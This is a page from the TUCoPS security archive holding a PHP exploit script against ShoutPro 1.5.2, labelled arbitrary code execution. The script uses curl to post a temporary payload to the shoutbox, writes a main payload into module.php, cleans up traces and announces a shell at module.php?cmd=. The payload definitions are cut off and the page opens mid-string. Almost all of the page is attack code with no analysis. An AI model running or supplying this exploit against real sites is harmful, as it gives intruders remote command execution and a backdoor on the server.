TUCoPS :: HP Unsorted S :: tb10463.htm

ShoutPro 1.5.2 - arbitrary code execution
ShoutPro 1.5.2 - arbitrary code execution
ShoutPro 1.5.2 - arbitrary code execution





 \n\tEx: http://www.example.com/shoutpro/\n"); 

$url = $argv[1];
//$url = "http://localhost/ShoutPro1.5.2/"; 

$ch = curl_init($url . "shoutbox.php");
if(!$ch) die("Error Initializing CURL");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
if(!$res) die("Error Connecting To Target - Is URL Valid?");

echo "[ ] Deploying Temp Payload...\n";

curl_setopt($ch, CURLOPT_URL,$url . "shoutbox.php?action=post");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"name=Beethoven&pass=&shout=".$temppayload."&post=Post");
$res = curl_exec($ch);
if(!$res) die("Error Deploying Temp Payload");

echo "[ ] Deploying Main Payload...\n";

curl_setopt($ch, CURLOPT_URL,$url . "shouts.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,"f=module.php&d=".$payload);
$res = curl_exec($ch);
if(!$res) die("Error Deploying Main Payload");

echo "[ ] Attempting Clean Up...\n";

curl_setopt($ch, CURLOPT_URL,$url . "module.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,"clean=doit");
$res = curl_exec($ch);
if(!$res) die("Error - Clean Up Failed");

echo "[ ] Clean Up Complete\n";
echo "[ ] Shell Accessible at ".$url."module.php?cmd=";

curl_close($ch);
?>

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH